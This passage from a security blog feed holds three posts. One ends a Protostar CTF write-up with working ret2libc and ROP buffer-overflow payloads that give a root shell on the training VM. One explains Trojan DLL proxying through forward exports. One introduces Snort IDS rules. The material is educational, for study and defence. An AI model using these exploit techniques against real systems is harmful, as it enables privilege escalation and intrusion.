0xbf. As we saw before, addresses on the stack start with 0xbf, but of course
this can be confirmed with a quick peak at ESP with GDB.</p>
<p>Long story short, no executing on the stack in this challenge.</p>
<p>We still have some methods we can use to gain control through what should now be
an obvious buffer overflow.</p>
<p>For this challenge, we’ll use <strong>ret2libc</strong>.</p>
<p><strong>ret2libc</strong> takes advantage of the fact that the libc library is in memory and
used by the program! We can thus set the <em>Return Address</em> to the address of any
function in the C library. Specifically, we’ll use the following C functions:</p>
<ul>
<li>system()</li>
<li>exit()</li>
</ul>
<p>We will overwrite part of the stack that was set prior to calling <code class="highlighter-rouge">getpath</code>,
and manually inject stack frames to call system() and exit(). We will overwrite
the <em>Return Address</em> of getpath() with the address of system().</p>
<p>system() takes one argument, a command to execute, and we will make system()’s
<em>Return Address</em> be the address of exit(). It does not matter what argument
exit() will receive as it will be interpreted as an int.</p>
<p>The stack will look as follows:</p>
<p><img src="/assets/images/protostar/stack6.png" alt="stack6" /></p>
<p>With our attack plan in mind, we now need to find the following:</p>
<ul>
<li>address of system</li>
<li>address of exit</li>
<li>address of a shell string</li>
<li>offset of the Return Address</li>
</ul>
<p>We’ll simplify our lives a bit and use Metasploit’s patterns to generate a
core dump and find our offset to the Return Address. From the core dump we’ll
also be able to find the addresses of our libc functions.</p>
<p>On our host machine with Metasploit installed:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/opt/metasploit/tools/exploit/pattern_create.rb <span class="nt">-l</span> 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
</code></pre></div></div>
<p>Let’s copy and paste the pattern as input for stack6.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@protostar:/opt/protostar/bin<span class="nv">$ </span>./stack6
input path please: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
got path Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0A6Ac72Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
Segmentation fault <span class="o">(</span>core dumped<span class="o">)</span>
</code></pre></div></div>
<p>And now let’s load the core dump</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@protostar:/opt/protostar/bin# gdb -q stack6 /tmp/core.11.stack6.2209
Reading symbols from /opt/protostar/bin/stack6...done.
warning: Can't read pathname for load map: Input/output error.
Reading symbols from /lib/libc.so.6...Reading symbols from /usr/lib/debug/lib/libc-2.11.2.so...done.
(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...Reading symbols from /usr/lib/debug/lib/ld-2.11.2.so...done.
(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
Core was generated by `./stack6'.
Program terminated with signal 11, Segmentation fault.
#0 0x37634136 in ?? ()
</code></pre></div></div>
<p>As we can see, EIP was set to <strong>0x37634136</strong>. On our host machine, let’s copy
this value, and again, use Metasploit, this time to detect what the offset was.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/opt/metasploit/tools/exploit/pattern_offset.rb <span class="nt">-q</span> 0x37634136
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Exact match at offset 80
</code></pre></div></div>
<p>We now have the offset, 80. Let’s go back to GDB with Stack6, and now find the
addresses we’re missing.</p>
<p>Let’s start with finding a shell string:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) x/4000s $esp
...
0xbffff9aa: "./stack6"
0xbffff9b3: "SHELL=/bin/sh"
0xbffff9c1: "TERM=xterm-256color"
0xbffff9d5: "SSH_CLIENT=192.168.56.1 59296 22"
0xbffff9f6: "SSH_TTY=/dev/pts/0"
0xbffffa09: "USER=user"
...
</code></pre></div></div>
<p>There is a lot of output, but when searching through we can find that the
environment contains our SHELL, with it’s path, all on the stack! Let’s take the
value <strong>0xbffff9b3</strong> and add 6.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) x/s 0xbffff9b3
0xbffff9b3: "SHELL=/bin/sh"
(gdb) x/s 0xbffff9b3+6
0xbffff9b9: "/bin/sh"
</code></pre></div></div>
<p>The address of our shell string is thus <strong>0xbffff9b9</strong>.</p>
<p>Now, last but not least, let’s find the address of our libc functions:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) p system
$1 = {<text variable, no debug info>} 0xb7ecffb0 <__libc_system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0xb7ec60c0 <*__GI_exit>
</code></pre></div></div>
<p>Easy, eh? :D</p>
<p>Let’s recap:</p>
<ul>
<li>address of system: <strong>0xb7ecffb0</strong></li>
<li>address of exit: <strong>0xb7ec60c0</strong></li>
<li>address of shell string: <strong>0xbffff9b9</strong></li>
<li>offset of the Return Address: <strong>80</strong></li>
</ul>
<p>Our payload should thus be in the following format:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>'A' * 80 + <address of system> + <address of exit> + <address of shell string>
</code></pre></div></div>
<blockquote>
<p>Note: ‘A’ can be anything, just need junk to fill up the first 80 bytes.</p>
</blockquote>
<p>Here’s my exploit:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@protostar:/opt/protostar/bin<span class="nv">$ </span>python <span class="nt">-c</span> <span class="s2">"print 'A' * 80 + '</span><span class="se">\x</span><span class="s2">b0</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">ec</span><span class="se">\x</span><span class="s2">b7' + '</span><span class="se">\x</span><span class="s2">c0</span><span class="se">\x</span><span class="s2">60</span><span class="se">\x</span><span class="s2">ec</span><span class="se">\x</span><span class="s2">b7' + '</span><span class="se">\x</span><span class="s2">b9</span><span class="se">\x</span><span class="s2">f9</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">bf'"</span> <span class="o">></span> /tmp/stack6.pwn
user@protostar:/opt/protostar/bin<span class="nv">$ </span><span class="o">(</span><span class="nb">cat</span> /tmp/stack6.pwn<span class="p">;</span> <span class="nb">cat</span><span class="o">)</span> | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����AAAAAAAAAAAA�����<span class="sb">`</span>췹���
whoami
root
</code></pre></div></div>
<p>We have a root shell :D</p>
<h2 id="stack7">stack7</h2>
<h3 id="description-7">Description</h3>
<p>https://exploit-exercises.com/protostar/stack7/</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
</span>
<span class="kt">char</span> <span class="o">*</span><span class="nf">getpath</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">ret</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"input path please: "</span><span class="p">);</span> <span class="n">fflush</span><span class="p">(</span><span class="n">stdout</span><span class="p">);</span>
<span class="n">gets</span><span class="p">(</span><span class="n">buffer</span><span class="p">);</span>
<span class="n">ret</span> <span class="o">=</span> <span class="n">__builtin_return_address</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="k">if</span><span class="p">((</span><span class="n">ret</span> <span class="o">&</span> <span class="mh">0xb0000000</span><span class="p">)</span> <span class="o">==</span> <span class="mh">0xb0000000</span><span class="p">)</span> <span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"bzzzt (%p)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">ret</span><span class="p">);</span>
<span class="n">_exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"got path %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">buffer</span><span class="p">);</span>
<span class="k">return</span> <span class="n">strdup</span><span class="p">(</span><span class="n">buffer</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">getpath</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>
<h3 id="write-up-7">Write-up</h3>
<p>This challenge is very similar to challenge 6, but this time the restriction
is even tougher. We cannot perform a ret2libc, as system functions start with
0xb.</p>
<p>Alright, ROP it is. :D</p>
<p>ROP stands for Return Oriented Programming. The idea is to find <em>gadgets</em>,
small sets of instructions already present in the code, to accomplish a specific
goal. These gadgets can then be chained together.</p>
<p>Let’s review what I said earlier concerning Return Addresses on the stack.</p>
<p>A Return Address is placed on the stack when a function is called (using the
assembly instruction <code class="highlighter-rouge">call</code>) so that when the function returns (using the
assembly instruction <code class="highlighter-rouge">ret</code>) the Return Address is popped off the stack and
into EIP.</p>
<p>In this challenge only the Return Address is being verified…</p>
<p>Well, why don’t we find a ROP gadget that is simply the address of “ret” located
in the executable, and build our stack similar to before?</p>
<p>Our stack will look as follows:</p>
<p><img src="/assets/images/protostar/stack7.png" alt="stack7" /></p>
<p>Execution will return to the address of our ret gadget. ret will get executed
making execution then return into system(), with a shell address as a parameter.
system() will then return into exit.</p>
<p>Let’s find that gadget:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@protostar:/opt/protostar/bin<span class="nv">$ </span>objdump <span class="nt">-d</span> stack7 | <span class="nb">grep</span> <span class="s2">"ret"</span>
8048383: c3 ret
8048494: c3 ret
80484c2: c3 ret
8048544: c3 ret
8048553: c3 ret
8048564: c3 ret
80485c9: c3 ret
80485cd: c3 ret
80485f9: c3 ret
8048617: c3 ret
</code></pre></div></div>
<p>Any of these addresses will work. I’ll pick the first, <strong>0x08048383</strong>.</p>
<p>And as said before, this is very similar to the previous, we only need to add
this ROP gadget. As such, our attack is as follows:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@protostar:/opt/protostar/bin<span class="nv">$ </span>python <span class="nt">-c</span> <span class="s2">"print 'A' * 80 + '</span><span class="se">\x</span><span class="s2">83</span><span class="se">\x</span><span class="s2">83</span><span class="se">\x</span><span class="s2">04</span><span class="se">\x</span><span class="s2">08' + '</span><span class="se">\x</span><span class="s2">b0</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">ec</span><span class="se">\x</span><span class="s2">b7' + '</span><span class="se">\x</span><span class="s2">c0</span><span class="se">\x</span><span class="s2">60</span><span class="se">\x</span><span class="s2">ec</span><span class="se">\x</span><span class="s2">b7' + '</span><span class="se">\x</span><span class="s2">b9</span><span class="se">\x</span><span class="s2">f9</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">bf'"</span> <span class="o">></span> /tmp/stack7.pwn
user@protostar:/opt/protostar/bin<span class="nv">$ </span><span class="o">(</span><span class="nb">cat</span> /tmp/stack7.pwn<span class="p">;</span> <span class="nb">cat</span><span class="o">)</span> | ./stack7
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA�������<span class="sb">`</span>췹���
whoami
root
</code></pre></div></div>
<p>And again, a root shell :D</p>
<h2 id="conclusion">Conclusion</h2>
<p>Thanks for reading and making it this far! Hopefully you learned a trick or two
in the process.</p>
<p>Please stay tuned for part 2 which will cover Protostar’s format string
challenges!</p>Kevin Almansakevin.almansa@gmail.comThis post will be the first part in a series of write-ups for Protostar's challenges.DLL Proxying2017-07-13T00:00:00+00:002017-07-13T00:00:00+00:00https://kevinalmansa.github.io/application%20security/DLL-Proxying<p>This post will be the first part in a series on DLL Security covering topics
such as DLL Proxying, DLL Injection, and IAT Hooking. Stay tuned :)</p>
<p>In this post we’ll focus on the theory of a technique known as DLL Proxying,
also known as DLL Redirection or DLL Reflection. In a next post we’ll focus on
implementing the technique!</p>
<h2 id="tools-and-prerequisites">Tools and Prerequisites</h2>
<p>The following software is used to examine the PE Header of an executable:
<a href="http://www.ntcore.com/exsuite.php">CFF Explorer</a></p>
<p>This post is rather technical, and as such, assumes knowledge of C++ and Windows
Programming using Visual Studios. A basic understanding of DLL’s and how to
implement one in C/C++ is a bonus.</p>
<h2 id="introduction">Introduction</h2>
<p>When studying the PE Executable Format, I ran into an explanation of how the
computer worm Stuxnet used a technique known as DLL Proxying, which is made
possible by a PE feature called <em>Forward Exports</em>. DLL Proxying was used in
Stuxnet’s attack phase to control and monitor communication to Programmable
Logic Controllers (PLCs), specifically targeting the centrifuge rotors at a
too-low or too-high frequency. The study of Stuxnet is fascinating on its own,
I deeply encourage readers to read more at:
<a href="https://www2.cs.arizona.edu/~collberg/Teaching/466-566/2012/Resources/presentations/2012/topic9-final/report.pdf">The Stuxnet Worm</a>.</p>
<p>Absolutely fascinated by how Stuxnet used DLL Proxying in its attack phase, I
wanted to consider how exactly this technique is done, and in turn, implement
such a technique (in a non-malicious way of course).</p>
<p>This post will focus on how exactly DLL Proxying works. We’ll first begin with
an overview of this technique and then explore how it is made possible with
features of the PE executable format.</p>
<p>Please note this post is related to a project I created which automates much of
this technique. The project with its details can be found here:
<a href="https://github.com/kevinalmansa/DLL_Wrapper">DLL Wrapper</a></p>
<h2 id="dll-proxying-overview">DLL Proxying Overview</h2>
<p>DLL Proxying is a technique in which an attacker replaces a DLL with a Trojan
version, renaming the original rather than deleting it. This Trojan DLL
implements exclusively the functions which the attacker wishes to
intercept/modify, while forwarding all other functions to the original DLL, thus
the name “Proxy”. The attacker can then <em>Man in the Middle</em> the functions
they’re interested in, and forward the rest to the original DLL, minimizing the
amount of work needed while ensuring functionality is not reduced or broken.</p>
<p>The entire attack is conducted in a six-step process:</p>
<ol>
<li>Analyze the original DLL, from here referred to as “<em>target DLL</em>”</li>
<li>Identify functions to intercept/modify</li>
<li>Implement intercepted functions in Trojan DLL</li>
<li>Forward all other functions to the <em>target DLL</em> (the original DLL)</li>
<li>Rename the <em>target DLL</em></li>
<li>Place Trojan DLL with original name of target DLL</li>
</ol>
<p>While the entire attack is a six-step process, this process can be grouped into
two phases:</p>
<ol>
<li>Creation of the Trojan DLL</li>
<li>Implementation of the Trojan DLL</li>
</ol>
<p>In the first phase, the Trojan DLL must be coded, with intercepted functions
implemented and exported. All remaining functions must make use of the PE
formats <em>Forward Exports</em> to export to the original DLL.</p>
<p>In the second phase, write permissions will be required at the target DLLs
location to rename the original DLL, and write the Trojan in its place.</p>
<p>This technique has several advantages:</p>
<ol>
<li>It’s simple to implement</li>
<li>We have full control over intercepted functions, including the ability to
monitor calls to the original</li>
<li>We do not directly modify the target application or DLL</li>
</ol>
<p>This technique relies on the ability to forward non-implemented functions to the
original DLL (which has been renamed). The next section will give an overview of
what an exported function is, followed by an overview of the PE executable
format, specifying how it can be leveraged to implement such a technique.</p>
<h2 id="dll-exported-functions">DLL Exported Functions</h2>
<p>Let’s begin by reviewing what is an exported function. A function that is
exported by an executable can be called and used by other applications.
Retrieving an exported function is done through two functions in Windows:</p>
<ul>
<li>LoadLibrary – Returns a handle for an executable</li>
<li>GetProcAddress – Returns a function pointer to the exported function</li>
</ul>
<p>An exported function can be retrieved by name, or by ordinal. The name would be
the function name given by the developer, and the ordinal is a unique numerical
value given to each exported function. It’s important to note that giving a name
to an exported function is optional, an ordinal value on the other hand is not.
If an ordinal value is not explicitly given, the linker will assign one of its
choice.</p>
<p>Despite the name being optional, most developers export functions with a name,
and retrieve it with a name as the ordinal value can be changed from one update
to the next. Also, frankly, names are much easier to remember and identify.</p>
<p>Finally, the last detail to know about exported functions; the function does not
have to be implemented in the DLL that is exporting it!</p>
<p>Wait, what?</p>
<p>This is known as a <em>Forward Export</em>, and, although not commonly used, is used by
Windows NTDLL.dll, Kernel32.dll, etc.</p>
<p>A Forward Export allows a developer to export a function from one module to be
handled by another. This is very useful for backwards compatibility
(for example), and of course, was very useful for Stuxent when implementing it’s
attack phase.</p>
<p>We’ll detail what a Forward Exported Function looks like in the next section.</p>
<h2 id="pe-executable-format">PE Executable Format</h2>
<p>The PE Executable Format is used for all windows executables, including DLLs,
System Files (kernel drivers), Control Panel files (.cpl), and even Screensavers
(.scr). It is used by the Windows Loader to manage the executable code,
detailing where execution should start, the size of the image in memory,
code/data sections, Thread Local Storage information, Imports, Exports, etc.</p>
<p>The PE Executable format is far too large of a topic to cover thoroughly in this
post, rather, we will see how we can use <em>CFF Explorer</em> to parse the PE format
for us, and of course, how to find the exported functions.</p>
<p>Let’s begin by defining two terms:</p>
<ul>
<li>RVA – Relative virtual address. This is the file offset in bytes (usually
represented in hexadecimal), and the offset relative to where the file is
mapped in memory.</li>
<li>VirtualAddress – The address of an item after it is loaded into memory.
Equal to the offset + base address of image.</li>
</ul>
<p>Let’s now take a look at a DLL, <em>Attacker_Example.dll</em>, using CFF Explorer. This
is a DLL I specifically made for this purpose, it contains Exported Functions as
well as a Forward Exported Function.</p>
<p><strong>CFF Explorer DOS-Header:</strong>
<img src="/assets/images/DLL_Proxying/PE-DOS-Header.PNG" alt="DOS Header" /></p>
<p>The PE Header, for legacy reasons, always starts with a DOS Header. The value we
care about in this header is <code class="highlighter-rouge">e_lfanew</code>. This specifies the file offset
where the PE Header can be found.</p>
<p><strong>CFF Explorer NT Header</strong>
<img src="/assets/images/DLL_Proxying/PE-NT-Header.PNG" alt="NT Header" /></p>
<p>Inside the PE Header (also called the NT Header) we have a few key elements:</p>
<ul>
<li>Machine: Architecture of the executable. This file is a x64 DLL, thus it’s AMD64.</li>
<li>Characteristics: We can see this is a DLL.</li>
</ul>
<p><strong>CFF Explorer NT Optional Header</strong>
<img src="/assets/images/DLL_Proxying/PE-NT-Header-Optional.PNG" alt="NT Optional Header" /></p>
<p>The NT Header contains an Optional Header (which ironically is not optional).
The key elements are:</p>
<ul>
<li><strong>Magic</strong>: Confirms whether x32 or x64 executable. Here it’s PE64, confirming we
have an x64 file.</li>
<li><strong>AddressOfEntryPoint</strong>: RVA of where code will start executing once loaded by
the Windows Loader. If debugging an unknown file, this is a good place to set
a breakpoint.</li>
<li><strong>DllCharacteristics</strong>: A few interesting values to note:
<ul>
<li>DLL can move: Supports ASLR</li>
<li>Image is NX Compatible: Supports DEP</li>
</ul>
</li>
<li><strong>DataDirectories</strong>: An array containing a <em>VirtualAddress</em> and <em>Size</em> for
each directory. Directories include: Export, Import, Resource, Debug, etc.
<ul>
<li>Note: The section it is located in must be manually computed. CFF Explorer
did it for us.</li>
</ul>
</li>
</ul>
<p><strong>CFF Explorer DataDirectories</strong>
<img src="/assets/images/DLL_Proxying/PE-Data-Directory.PNG" alt="NT DataDirectories" /></p>
<p>Now, to find the Export Directories location in the file, we need to use the
following formula:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>File Offset = Section.RawAddress + (DataDirectory.VirtualAddress - Section.VirtualAddress)
</code></pre></div></div>
<p>In this case:</p>
<ul>
<li>Section = rdata</li>
<li>Section.RawAddress = 8000</li>
<li>Section.VirtualAddress = 19000</li>
<li>DataDirectory.VirtualAddress = 1B8F0</li>
</ul>
<p>Our file offset is A8F0.</p>
<p>This step is necessary because CFF Explorer will not show us if an exported
function is a Forward Export or not.</p>
<p><strong>CFF Explorer Export Directory</strong>
<img src="/assets/images/DLL_Proxying/PE-Export-Directory.PNG" alt="Export Directory" /></p>
<p>As we can see, we have three functions, exported by name. These are the names
used when calling <code class="highlighter-rouge">GetProcAddress</code> to get a function pointer. Again, we
cannot tell just by this screen that <code class="highlighter-rouge">print_dll_name</code> is a Forward Export.
To do so, we must open the Hex Editor and go to offset A8F0.</p>
<p><strong>CFF Explorer Hex Editor</strong>
<img src="/assets/images/DLL_Proxying/PE-Hex-Editor.PNG" alt="Hex Editor" /></p>
<p>We can see the name of <code class="highlighter-rouge">print_dll_name</code> follows a different format than the
others; it begins with a DLL name.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Target_DLL2.dll.print_dll_name
</code></pre></div></div>
<p>This is telling us that although this DLL is exporting a function named
<code class="highlighter-rouge">print_dll_name</code>, the function is actually located in <code class="highlighter-rouge">Target_DLL2.dll</code>.</p>
<p>When calling Forward Exported functions, the Windows Loader will check if the
DLL referred to (here <code class="highlighter-rouge">Target_DLL2.dll</code>) is loaded. If the referred DLL is
not already loaded into memory, the Windows Loader will load it, and finally,
will retrieve the address of the function (here <code class="highlighter-rouge">print_dll_name</code>) so that we
may call it.</p>
<h2 id="conclusion">Conclusion</h2>
<p>As we saw, DLL Proxying is made possible by a feature of the PE executable
format known as Forward Exports. The Trojan DLL simply replaces the original,
renaming the original DLL rather than deleting it, and forwarding to it all
non-implemented functions.</p>
<p>Detection of such a technique is simple. The signature of the Trojan DLL will be
radically different to the original, and upon manual static analysis, will
contain a lot of forward exported functions.</p>
<p>Thanks for reading!</p>
<h2 id="references">References</h2>
<p>This post was made possible thanks to <a href="https://dl.packetstormsecurity.net/papers/win/intercept_apis_dll_redirection.pdf">intercept_apis_dll_redirection</a>
which I used as a reference when implementing this technique. I highly encourage
readers to take a look, it’s amazing.</p>Kevin Almansakevin.almansa@gmail.comThis post will be the first part in a series on DLL Security covering topics such as DLL Proxying, DLL Injection, and IAT Hooking.The Snort Intrusion Detection System2017-07-08T00:00:00+00:002017-07-08T00:00:00+00:00https://kevinalmansa.github.io/ids/ips/Snort<p>This post is an overview of the Snort IDS/IPS. Details are given about it’s
modes, components, and example rules. I originally wrote this report while
pursing my MSc in Computer Security.</p>
<h2 id="snort-overview">Snort Overview</h2>
<p>Snort is an open source <em>Network Intrusion Detection System</em> [1] (NIDS). NIDS are
responsible for analyzing traffic from a network, and testing each packet
against a list of rules. If a packet corresponds to a rule, the NIDS can log the
event, send an alert, and/or take an action such as dropping the packet. We will
first take a look at what Snort does, and how it works. We will then examine how
rules used by the detection engine are formed, and what role <em>Pearl Compatible
Regular Expression (PCRE)</em> has in these rules. Finally we will finish with
examples of rules, particularly rules that demonstrate the importance of PCRE.</p>
<h3 id="snort-modes">Snort Modes</h3>
<p>Snort is a Network Intrusion Detection System, but comes with three modes of
operation, all of which are parts of the NIDS in itself. The first mode,
<strong>Sniffer Mode</strong> [2], displays packets that transit over the network. It may be configured to display various types of packets (TCP, UDP, ICMP), as well as what
to display of the packets themselves, either the headers or packet data as well.</p>
<p>The second mode of operation granted by snort is the <strong>Packet Logger Mode</strong> [3].
It allows the user to save packets detected from Sniffer Mode to be saved to the
hard disk. Through this mode, the user may specify rules indicating which
packets to save, for example, to save only packets relative to (going to, or
coming from) a specific address.</p>
<p>Finally, the last mode is the <strong>NIDS Mode</strong> [4]. This mode is very similar to
the packet logger, but allows for more specific rules to be applied to packets,
refining the packets that are in fact logged (or alerted). The rules applied are
specified, or included in the configuration file that is passed as a parameter
when launching snort.</p>
<p>It must be noted that each of these modes have various options which may be
configured through command line parameters or even configuration files. For
example, with alerts triggered in NIDS mode, you may configure the contents of
the alerts, where the alerts are stored, or even if you just want to output to
console, or through a UNIX socket to another program. While the input for the
NIDS is typically done with the Sniffer Mode, this can be replaced with a .pcap
(packet capture) file if sniffing is not an option; either the intrusion already
occurred, or you cannot place Snort in a location to allow sniffing.</p>
<h3 id="snort-components">Snort Components</h3>
<p>Snort is composed of four major components, which chained together allows snort
to fulfill its various modes. The first component is the <strong>Decoder</strong> which is
responsible for forming packets to be used by the other components. As mentioned
in the Snort FAQ, it <em>“has the job of determining which underlying protocols are</em>
<em>used in the packet”</em> [5] as well as determining the location and size of the
packet data which is then used in later components. It should be noted that the
Decoder also looks for anomalies in headers (such as invalid sizes), which may
then cause it to generate alerts.</p>
<p>The next major components are the <strong>Preprocessors</strong>. These components work as
plugins, and are able to arrange or modify packet data. This allows services
(such as HTTP [6], or FTP [7]) to have a corresponding preprocessor to verify
anomalies specific to that service. Its job is ultimately to try and make it
harder to fool the detection engine. Examples of how it can do this are by
decoding URI’s, defragmenting packets [8] (Fragmentation of packets can be used
to fool the detection engine), detect port scanning [9], as well as detect
anomalies in ARP packets [10], such as ARP spoofing.</p>
<p>The primary component, the Detection Engine has the responsibility to <em>“detect</em>
<em>if any intrusion activity exists in a packet”</em> [11]. It does this by chaining
together sets of rules, specified in configuration files which include these
rules, and applying them to each packet. If the packet matches a rule, the
specified action of that rule is taken, or the packet is dropped. If snort is
performing this in real time, depending on the network load, latency may be
experienced, with worst case scenarios resulting in packets being dropped all
together.</p>
<p>If a packet is matched to a rule, the log and or alert will be generated by the
<strong>Alert and Logging System</strong>. The message and contents generated by this
component can of course be configured through the configuration file. If a
packet triggers multiple rules, the highest alert level is what will actually be
generated by this component.</p>
<p>Finally, after an alert or log is generated, it passes through the <strong>Output</strong>
<strong>Modules</strong> component. This component is tasked with controlling the type of
output generated, uses a plugin system [12] giving the user flexibility, and is
also highly configurable. This may include simply logging, or logging to a
database, sending SNMP traps, generating XML reports, or even sending alerts
through UNIX sockets, allowing for (for example) dynamic modification of network
configurations (Firewalls or Routers).</p>
<h3 id="snort-rules">Snort Rules</h3>
<p>As previously mentioned, rules are used throughout components to detect
anomalies in packets. Rules may be applied to Network and Transport Layer
headers (IP, TCP, UDP, ICMP), or even Application layer headers (FTP, HTTP,
etc.), but of course the rules can also be applied to packet data (the payload).</p>
<p>Rules are composed of two parts, a <strong>Rule Header</strong>, which specifies what action
should be taken in case of a match, the type of packet (TCP, UDP, etc.), as well
as source and destination IP’s and port numbers. The last part is the <strong>Rule</strong>
<strong>Options</strong>, which specifies content that flags packets as a match, the overall
rule will take the following form:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>action protocol source port -> destination port (options)
</code></pre></div></div>
<p>It should be noted that while most options are optional, the <em>sid</em> (Snort ID) is
required, and should not conflict with the SID of another rule. It is the unique
identifier given to each rule. Snort reserves SIDs from 0 - 1,000,000. [13]</p>
<p>In the rule options, amongst a long list of possible flags that may be used to
detect various bits of data in packets, users may include <strong>Pearl Compatible</strong>
<strong>Regular Expressions</strong> through the option <em>pcre</em>. This allows the detection of
data in the packet by using Regular Expressions, giving rules more control and
flexibility. PCRE takes the standard format <code class="highlighter-rouge">/expression/flags</code>, although
double quotes, semi-colons, and forward-slashes must be escaped.</p>
<h2 id="rule-examples">Rule Examples</h2>
<h3 id="security">Security</h3>
<p>Alert if the packet contains the word SECURITY.</p>
<h4 id="rule">Rule</h4>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>alert ip any any -> any any (sid:1000001;msg:"Word SECURITY found";content:"SECURITY";)
</code></pre></div></div>
<h4 id="description">Description</h4>
<p>In this example, we can notice a few things:</p>
<ul>
<li><code class="highlighter-rouge">alert</code>: this allows us to trigger an alert if rule matches</li>
<li><code class="highlighter-rouge">ip</code>: this allows the rules to be matched against any protocol
(TCP, UDP, or ICMP)</li>
<li><code class="highlighter-rouge">any any -> any any</code>: any source host and port to any destination host
and port</li>
<li><code class="highlighter-rouge">sid:1000001;msg:"Word SECURITY found"</code>: the ID of the rule, and the
message to send with the alert.</li>
</ul>
<p>The particularity of this rule is the option content. As the Snort manual
describes <em>“Whenever a content option pattern match is performed, the</em>
<em>Boyer-Moore pattern match function is called and the (rather computationally</em>
<em>expensive) test is performed against the packet contents”</em> [14]. As we can tell
from this, here I’m simply looking for <code class="highlighter-rouge">SECURITY</code>, in a case sensitive match.</p>
<h3 id="hello-world">Hello World</h3>
<p>Alert if the packet contains the phrase “Hello World”, with one or more spaces
between Hello and World.</p>
<h4 id="rule-1">Rule</h4>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>alert ip any any -> any any (sid:1000002;msg:"Phrase Hello World found";pcre:"/Hello\s+World/";)
</code></pre></div></div>
<h4 id="description-1">Description</h4>
<p>The only new feature in this example is the presence of <em>pcre</em> instead of
<em>content</em> as an option. As the name suggest, it allows us to use Pearl
Compatible Regular Expressions. This regular expression looks for Hello followed
by one or more spaces (<code class="highlighter-rouge">\s+</code>) followed by World.</p>
<h3 id="mail-server">Mail Server</h3>
<p>Alert if a packet from any computer to a mail server contains a single word of
text enclosed in double quotes, which starts with a capital letter, and is
between four and seven letters long.</p>
<h4 id="rule-2">Rule</h4>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>alert ip any any -> any smtp (sid:1000002;msg"Double quoted text sent to mail server found";pcre:"/\"[A-Z][a-zA-Z]{3,6}\"/";)
</code></pre></div></div>
<h4 id="description-2">Description</h4>
<p>Here we use the destination port to specify packets going to mail servers (smtp
can be replaced by 25). Backslashes are required in the PCRE option to escape
quotes. The PCRE used looks for any string starting with a double quote,
followed by a capital (<code class="highlighter-rouge">[A-Z]</code>), with a total of 4-7 letters in length, thus the
capital plus 3 to 6 letters (<code class="highlighter-rouge">[a-zA-Z]{3,6}</code>), followed by a double quote.</p>
<h3 id="web-server">Web Server</h3>
<p>Alert if a packet from any computer is sent to a web server containing a UK
national insurance number.</p>
<h4 id="rule-3">Rule</h4>
